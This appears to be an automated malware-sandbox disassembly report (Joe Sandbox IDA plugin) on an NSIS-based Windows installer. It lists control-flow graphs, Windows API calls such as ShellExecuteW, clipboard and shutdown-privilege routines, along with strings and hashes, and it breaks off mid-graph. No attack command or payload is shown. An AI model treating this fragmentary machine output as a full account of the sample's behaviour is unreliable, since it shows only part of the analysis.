GetDlgItem 5058->5063 5064 40462f SHBrowseForFolderW 5059->5064 5060 4046c9 5065 40677e 18 API calls 5060->5065 5067 403d3f 19 API calls 5061->5067 5068 404503 IsDlgButtonChecked 5063->5068 5063->5108 5064->5048 5069 404647 CoTaskMemFree 5064->5069 5070 4046cf 5065->5070 5071 40456f 5066->5071 5072 404597 5067->5072 5068->5043 5073 406722 3 API calls 5069->5073 5113 406009 lstrcpynW 5070->5113 5071->5061 5077 406722 3 API calls 5071->5077 5074 403d3f 19 API calls 5072->5074 5075 404654 5073->5075 5078 4045a2 5074->5078 5079 40468b SetDlgItemTextW 5075->5079 5084 406805 18 API calls 5075->5084 5077->5061 5111 403d98 SendMessageW 5078->5111 5079->5048 5080 4046e6 5082 4062fc 3 API calls 5080->5082 5091 4046ee 5082->5091 5083 4045aa 5087 4062fc 3 API calls 5083->5087 5085 404673 lstrcmpiW 5084->5085 5085->5079 5088 404684 lstrcatW 5085->5088 5086 404730 5114 406009 lstrcpynW 5086->5114 5087->5053 5088->5079 5090 404739 5092 405d59 4 API calls 5090->5092 5091->5086 5096 406751 2 API calls 5091->5096 5097 404785 5091->5097 5093 40473f GetDiskFreeSpaceW 5092->5093 5095 404763 MulDiv 5093->5095 5093->5097 5095->5097 5096->5091 5099 4047e2 5097->5099 5100 4043ad 21 API calls 5097->5100 5098 404805 5115 403d85 KiUserCallbackDispatcher 5098->5115 5099->5098 5101 40141d 80 API calls 5099->5101 5102 4047d3 5100->5102 5101->5098 5104 4047e4 SetDlgItemTextW 5102->5104 5105 4047d8 5102->5105 5104->5099 5106 4043ad 21 API calls 5105->5106 5106->5099 5107 404821 5107->5108 5116 403d61 5107->5116 5108->5057 5110->5047 5111->5083 5112->5060 5113->5080 5114->5090 5115->5107 5117 403d74 SendMessageW 5116->5117 5118 403d6f 5116->5118 5117->5108 5118->5117 5119 402da5 5120 4030e3 5119->5120 5121 402dac 5119->5121 5122 401446 18 API calls 5121->5122 5123 402db8 5122->5123 5124 402dbf SetFilePointer 5123->5124 5124->5120 5125 402dcf 5124->5125 5125->5120 5127 405f51 wsprintfW 5125->5127 5127->5120 5128 4030a9 SendMessageW 5129 4030c2 InvalidateRect 5128->5129 5130 4030e3 5128->5130 5129->5130 5131 401cb2 5132 40145c 18 API calls 5131->5132 5133 401c54 5132->5133 5134 4062a3 11 API calls 5133->5134 5137 401c64 5133->5137 5135 401c59 5134->5135 5136 406c9b 81 API calls 5135->5136 5136->5137 4087 4021b5 4088 40145c 18 API calls 4087->4088 4089 4021bb 4088->4089 4090 40145c 18 API calls 4089->4090 4091 4021c4 4090->4091 4092 40145c 18 API calls 4091->4092 4093 4021cd 4092->4093 4094 40145c 18 API calls 4093->4094 4095 4021d6 4094->4095 4096 404f72 25 API calls 4095->4096 4097 4021e2 ShellExecuteW 4096->4097 4098 40221b 4097->4098 4099 40220d 4097->4099 4101 4062a3 11 API calls 4098->4101 4100 4062a3 11 API calls 4099->4100 4100->4098 4102 402230 4101->4102 5145 402238 5146 40145c 18 API calls 5145->5146 5147 40223e 5146->5147 5148 4062a3 11 API calls 5147->5148 5149 40224b 5148->5149 5150 404f72 25 API calls 5149->5150 5151 402255 5150->5151 5152 405c3f 2 API calls 5151->5152 5153 40225b 5152->5153 5154 4062a3 11 API calls 5153->5154 5157 4022ac CloseHandle 5153->5157 5160 40226d 5154->5160 5156 4030e3 5157->5156 5158 402283 WaitForSingleObject 5159 402291 GetExitCodeProcess 5158->5159 5158->5160 5159->5157 5162 4022a3 5159->5162 5160->5157 5160->5158 5161 406332 2 API calls 5160->5161 5161->5158 5164 405f51 wsprintfW 5162->5164 5164->5157 5165 4040b8 5166 4040d3 5165->5166 5174 404201 5165->5174 5170 40410e 5166->5170 5196 403fca WideCharToMultiByte 5166->5196 5167 40426c 5168 404276 GetDlgItem 5167->5168 5169 40433e 5167->5169 5171 404290 5168->5171 5172 4042ff 5168->5172 5175 403dca 8 API calls 5169->5175 5177 403d3f 19 API calls 5170->5177 5171->5172 5180 4042b6 6 API calls 5171->5180 5172->5169 5181 404311 5172->5181 5174->5167 5174->5169 5176 40423b GetDlgItem SendMessageW 5174->5176 5179 404339 5175->5179 5201 403d85 KiUserCallbackDispatcher 5176->5201 5178 40414e 5177->5178 5183 403d3f 19 API calls 5178->5183 5180->5172 5184 404327 5181->5184 5185 404317 SendMessageW 5181->5185 5188 40415b CheckDlgButton 5183->5188 5184->5179 5189 40432d SendMessageW 5184->5189 5185->5184 5186 404267 5187 403d61 SendMessageW 5186->5187 5187->5167 5199 403d85 KiUserCallbackDispatcher 5188->5199 5189->5179 5191 404179 GetDlgItem 5200 403d98 SendMessageW 5191->5200 5193 40418f SendMessageW 5194 4041b5 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5193->5194 5195 4041ac GetSysColor 5193->5195 5194->5179 5195->5194 5197 404007 5196->5197 5198 403fe9 GlobalAlloc WideCharToMultiByte 5196->5198 5197->5170 5198->5197 5199->5191 5200->5193 5201->5186 4196 401eb9 4197 401f24 4196->4197 4198 401ec6 4196->4198 4199 401f53 GlobalAlloc 4197->4199 4200 401f28 4197->4200 4201 401ed5 4198->4201 4208 401ef7 4198->4208 4202 406805 18 API calls 4199->4202 4207 4062a3 11 API calls 4200->4207 4212 401f36 4200->4212 4203 4062a3 11 API calls 4201->4203 4206 401f46 4202->4206 4204 401ee2 4203->4204 4209 402708 4204->4209 4214 406805 18 API calls 4204->4214 4206->4209 4210 402387 GlobalFree 4206->4210 4207->4212 4218 406009 lstrcpynW 4208->4218 4210->4209 4220 406009 lstrcpynW 4212->4220 4213 401f06 4219 406009 lstrcpynW 4213->4219 4214->4204 4216 401f15 4221 406009 lstrcpynW 4216->4221 4218->4213 4219->4216 4220->4206 4221->4209 5202 4074bb 5204 407344 5202->5204 5203 407c6d 5204->5203 5205 4073c2 GlobalFree 5204->5205 5206 4073cb GlobalAlloc 5204->5206 5207 407443 GlobalAlloc 5204->5207 5208 40743a GlobalFree 5204->5208 5205->5206 5206->5203 5206->5204 5207->5203 5207->5204 5208->5207

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 0 4050cd-4050e8 1 405295-40529c 0->1 2 4050ee-4051d5 GetDlgItem * 3 call 403d98 call 404476 call 406805 call 4062a3 GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052c6-4052d3 1->3 4 40529e-4052c0 GetDlgItem CreateThread CloseHandle 1->4 35 4051f3-4051f6 2->35 36 4051d7-4051f1 SendMessageW * 2 2->36 6 4052f4-4052fb 3->6 7 4052d5-4052de 3->7 4->3 11 405352-405356 6->11 12 4052fd-405303 6->12 9 4052e0-4052ef ShowWindow * 2 call 403d98 7->9 10 405316-40531f call 403dca 7->10 9->6 22 405324-405328 10->22 11->10 14 405358-40535b 11->14 16 405305-405311 call 403d18 12->16 17 40532b-40533b ShowWindow 12->17 14->10 20 40535d-405370 SendMessageW 14->20 16->10 23 40534b-40534d call 403d18 17->23 24 40533d-405346 call 404f72 17->24 27 405376-405397 CreatePopupMenu call 406805 AppendMenuW 20->27 28 40528e-405290 20->28 23->11 24->23 37 405399-4053aa GetWindowRect 27->37 38 4053ac-4053b2 27->38 28->22 39 405206-40521d call 403d3f 35->39 40 4051f8-405204 SendMessageW 35->40 36->35 41 4053b3-4053cb TrackPopupMenu 37->41 38->41 46 405253-405274 GetDlgItem SendMessageW 39->46 47 40521f-405233 ShowWindow 39->47 40->39 41->28 43 4053d1-4053e8 41->43 45 4053ed-405408 SendMessageW 43->45 45->45 48 40540a-40542d OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 46->28 51 405276-40528c SendMessageW * 2 46->51 49 405242 47->49 50 405235-405240 ShowWindow 47->50 52 40542f-405458 SendMessageW 48->52 53 405248-40524e call 403d98 49->53 50->53 51->28 52->52 54 40545a-405474 GlobalUnlock SetClipboardData CloseClipboard 52->54 53->46 54->28
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,00000403), ref: 0040512F
                                                                            • GetDlgItem.USER32(?,000003EE), ref: 0040513E
                                                                            • GetClientRect.USER32(?,?), ref: 00405196
                                                                            • GetSystemMetrics.USER32(00000015), ref: 0040519E
                                                                            • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
                                                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
                                                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
                                                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
                                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
                                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
                                                                            • ShowWindow.USER32(?,00000008), ref: 0040523A
                                                                            • GetDlgItem.USER32(?,000003EC), ref: 0040525B
                                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
                                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
                                                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
                                                                            • GetDlgItem.USER32(?,000003F8), ref: 0040514D
                                                                              • Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                                              • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                              • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                              • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004052AB
                                                                            • CreateThread.KERNELBASE(00000000,00000000,Function_00005047,00000000), ref: 004052B9
                                                                            • CloseHandle.KERNELBASE(00000000), ref: 004052C0
                                                                            • ShowWindow.USER32(00000000), ref: 004052E7
                                                                            • ShowWindow.USER32(?,00000008), ref: 004052EC
                                                                            • ShowWindow.USER32(00000008), ref: 00405333
                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
                                                                            • CreatePopupMenu.USER32 ref: 00405376
                                                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
                                                                            • GetWindowRect.USER32(?,?), ref: 0040539E
                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
                                                                            • OpenClipboard.USER32(00000000), ref: 0040540B
                                                                            • EmptyClipboard.USER32 ref: 00405411
                                                                            • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
                                                                            • GlobalLock.KERNEL32(00000000), ref: 00405427
                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0040545D
                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00405468
                                                                            • CloseClipboard.USER32 ref: 0040546E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                            • String ID: @rD$New install of "%s" to "%s"${
                                                                            • API String ID: 2110491804-2409696222
                                                                            • Opcode ID: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
                                                                            • Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
                                                                            • Opcode Fuzzy Hash: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
                                                                            • Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 305 403883-403919 #17 SetErrorMode OleInitialize call 4062fc SHGetFileInfoW call 406009 GetCommandLineW call 406009 GetModuleHandleW 312 403923-403937 call 405d06 CharNextW 305->312 313 40391b-40391e 305->313 316 4039ca-4039d0 312->316 313->312 317 4039d6 316->317 318 40393c-403942 316->318 319 4039f5-403a0d GetTempPathW call 4037cc 317->319 320 403944-40394a 318->320 321 40394c-403950 318->321 328 403a33-403a4d DeleteFileW call 403587 319->328 329 403a0f-403a2d GetWindowsDirectoryW lstrcatW call 4037cc 319->329 320->320 320->321 323 403952-403957 321->323 324 403958-40395c 321->324 323->324 326 4039b8-4039c5 call 405d06 324->326 327 40395e-403965 324->327 326->316 342 4039c7 326->342 331 403967-40396e 327->331 332 40397a-40398c call 403800 327->332 345 403acc-403adb call 403859 CoUninitialize 328->345 346 403a4f-403a55 328->346 329->328 329->345 333 403970-403973 331->333 334 403975 331->334 343 4039a1-4039b6 call 403800 332->343 344 40398e-403995 332->344 333->332 333->334 334->332 342->316 343->326 361 4039d8-4039f0 call 407d6e call 406009 343->361 348 403997-40399a 344->348 349 40399c 344->349 359 403ae1-403af1 call 405ca0 ExitProcess 345->359 360 403bce-403bd4 345->360 351 403ab5-403abc call 40592c 346->351 352 403a57-403a60 call 405d06 346->352 348->343 348->349 349->343 358 403ac1-403ac7 call 4060e7 351->358 362 403a79-403a7b 352->362 358->345 365 403c51-403c59 360->365 366 403bd6-403bf3 call 4062fc * 3 360->366 361->319 370 403a62-403a74 call 403800 362->370 371 403a7d-403a87 362->371 372 403c5b 365->372 373 403c5f 365->373 397 403bf5-403bf7 366->397 398 403c3d-403c48 ExitWindowsEx 366->398 370->371 384 403a76 370->384 378 403af7-403b11 lstrcatW lstrcmpiW 371->378 379 403a89-403a99 call 40677e 371->379 372->373 378->345 383 403b13-403b29 CreateDirectoryW SetCurrentDirectoryW 378->383 379->345 390 403a9b-403ab1 call 406009 * 2 379->390 387 403b36-403b56 call 406009 * 2 383->387 388 403b2b-403b31 call 406009 383->388 384->362 404 403b5b-403b77 call 406805 DeleteFileW 387->404 388->387 390->351 397->398 402 403bf9-403bfb 397->402 398->365 401 403c4a-403c4c call 40141d 398->401 401->365 402->398 406 403bfd-403c0f GetCurrentProcess 402->406 412 403bb8-403bc0 404->412 413 403b79-403b89 CopyFileW 404->413 406->398 411 403c11-403c33 406->411 411->398 412->404 414 403bc2-403bc9 call 406c68 412->414 413->412 415 403b8b-403bab call 406c68 call 406805 call 405c3f 413->415 414->345 415->412 425 403bad-403bb4 CloseHandle 415->425 425->412
                                                                            APIs
                                                                            • #17.COMCTL32 ref: 004038A2
                                                                            • SetErrorMode.KERNELBASE(00008001), ref: 004038AD
                                                                            • OleInitialize.OLE32(00000000), ref: 004038B4
                                                                              • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                              • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                              • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                            • SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC
                                                                              • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                            • GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
                                                                            • GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
                                                                            • CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
                                                                            • GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
                                                                            • GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
                                                                            • lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
                                                                            • DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
                                                                            • CoUninitialize.COMBASE(?), ref: 00403AD1
                                                                            • ExitProcess.KERNEL32 ref: 00403AF1
                                                                            • lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
                                                                            • lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
                                                                            • CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
                                                                            • SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
                                                                            • DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
                                                                            • CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
                                                                            • CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
                                                                            • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
                                                                            • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                            • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
                                                                            • API String ID: 2435955865-239407132
                                                                            • Opcode ID: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                                            • Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
                                                                            • Opcode Fuzzy Hash: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                                            • Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 787 4074bb-4074c0 788 4074c2-4074ef 787->788 789 40752f-407547 787->789 791 4074f1-4074f4 788->791 792 4074f6-4074fa 788->792 790 407aeb-407aff 789->790 796 407b01-407b17 790->796 797 407b19-407b2c 790->797 793 407506-407509 791->793 794 407502 792->794 795 4074fc-407500 792->795 798 407527-40752a 793->798 799 40750b-407514 793->799 794->793 795->793 800 407b33-407b3a 796->800 797->800 803 4076f6-407713 798->803 804 407516 799->804 805 407519-407525 799->805 801 407b61-407c68 800->801 802 407b3c-407b40 800->802 818 407350 801->818 819 407cec 801->819 807 407b46-407b5e 802->807 808 407ccd-407cd4 802->808 810 407715-407729 803->810 811 40772b-40773e 803->811 804->805 806 407589-4075b6 805->806 814 4075d2-4075ec 806->814 815 4075b8-4075d0 806->815 807->801 812 407cdd-407cea 808->812 816 407741-40774b 810->816 811->816 817 407cef-407cf6 812->817 820 4075f0-4075fa 814->820 815->820 821 40774d 816->821 822 4076ee-4076f4 816->822 823 407357-40735b 818->823 824 40749b-4074b6 818->824 825 40746d-407471 818->825 826 4073ff-407403 818->826 819->817 829 407600 820->829 830 407571-407577 820->830 831 407845-4078a1 821->831 832 4076c9-4076cd 821->832 822->803 828 407692-40769c 822->828 823->812 833 407361-40736e 823->833 824->790 838 407c76-407c7d 825->838 839 407477-40748b 825->839 844 407409-407420 826->844 845 407c6d-407c74 826->845 834 4076a2-4076c4 828->834 835 407c9a-407ca1 828->835 847 407556-40756e 829->847 848 407c7f-407c86 829->848 836 40762a-407630 830->836 837 40757d-407583 830->837 831->790 840 407c91-407c98 832->840 841 4076d3-4076eb 832->841 833->819 849 407374-4073ba 833->849 834->831 835->812 850 40768e 836->850 851 407632-40764f 836->851 837->806 837->850 838->812 846 40748e-407496 839->846 840->812 841->822 852 407423-407427 844->852 845->812 846->825 856 407498 846->856 847->830 848->812 854 4073e2-4073e4 849->854 855 4073bc-4073c0 849->855 850->828 857 407651-407665 851->857 858 407667-40767a 851->858 852->826 853 407429-40742f 852->853 860 407431-407438 853->860 861 407459-40746b 853->861 864 4073f5-4073fd 854->864 865 4073e6-4073f3 854->865 862 4073c2-4073c5 GlobalFree 855->862 863 4073cb-4073d9 GlobalAlloc 855->863 856->824 859 40767d-407687 857->859 858->859 859->836 866 407689 859->866 867 407443-407453 GlobalAlloc 860->867 868 40743a-40743d GlobalFree 860->868 861->846 862->863 863->819 869 4073df 863->869 864->852 865->864 865->865 871 407c88-407c8f 866->871 872 40760f-407627 866->872 867->819 867->861 868->867 869->854 871->812 872->836
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                            • Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
                                                                            • Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                            • Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                            • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: AddressHandleLibraryLoadModuleProc
                                                                            • String ID:
                                                                            • API String ID: 310444273-0
                                                                            • Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                            • Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
                                                                            • Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                            • Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC
                                                                            APIs
                                                                            • FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                            • FindClose.KERNEL32(00000000), ref: 004062EC
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2185872299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2185850908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185900137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2185923593.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2186065207.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_InsertSr.jbxd
                                                                            Similarity
                                                                            • API ID: Find$CloseFileFirst
                                                                            • String ID:
                                                                            • API String ID: 2295610775-0
                                                                            • Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                            • Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
                                                                            • Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                            • Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 56 405479-40548b 57 405491-405497 56->57 58 4055cd-4055dc 56->58 57->58 59 40549d-4054a6 57->59 60 40562b-405640 58->60 61 4055de-405626 GetDlgItem * 2 call 403d3f SetClassLongW call 40141d 58->61 62 4054a8-4054b5 SetWindowPos 59->62 63 4054bb-4054be 59->63 65 405680-405685 call 403daf 60->65 66 405642-405645 60->66 61->60 62->63 68 4054c0-4054d2 ShowWindow 63->68 69 4054d8-4054de 63->69 74 40568a-4056a5 65->74 71 405647-405652 call 40139d 66->71 72 405678-40567a 66->72 68->69 75 4054e0-4054f5 DestroyWindow 69->75 76 4054fa-4054fd 69->76 71->72 93 405654-405673 SendMessageW 71->93 72->65 73 405920 72->73 81 405922-405929 73->81 79 4056a7-4056a9 call 40141d 74->79 80 4056ae-4056b4 74->80 82 4058fd-405903 75->82 84 405510-405516 76->84 85 4054ff-40550b SetWindowLongW 76->85 79->80 89 4056ba-4056c5 80->89 90 4058de-4058f7 DestroyWindow KiUserCallbackDispatcher 80->90 82->73 87 405905-40590b 82->87 91 4055b9-4055c8 call 403dca 84->91 92 40551c-40552d GetDlgItem 84->92 85->81 87->73 95 40590d-405916 ShowWindow 87->95 89->90 96 4056cb-405718 call 406805 call 403d3f * 3 GetDlgItem 89->96 90->82 91->81 97 40554c-40554f 92->97 98 40552f-405546 SendMessageW IsWindowEnabled 92->98 93->81 95->73 126 405723-40575f ShowWindow KiUserCallbackDispatcher call 403d85 EnableWindow 96->126 127 40571a-405720 96->127 101 405551-405552 97->101 102 405554-405557 97->102 98->73 98->97 103 405582-405587 call 403d18 101->103 104 405565-40556a 102->104 105 405559-40555f 102->105 103->91 107 4055a0-4055b3 SendMessageW 104->107 109 40556c-405572 104->109 105->107 108 405561-405563 105->108 107->91 108->103 112 405574-40557a call 40141d 109->112 113 405589-405592 call 40141d 109->113 122 405580 112->122 113->91 123 405594-40559e 113->123 122->103 123->122 130 405761-405762 126->130 131 405764 126->131 127->126 132 405766-405794 GetSystemMenu EnableMenuItem SendMessageW 130->132 131->132 133 405796-4057a7 SendMessageW 132->133 134 4057a9 132->134 135 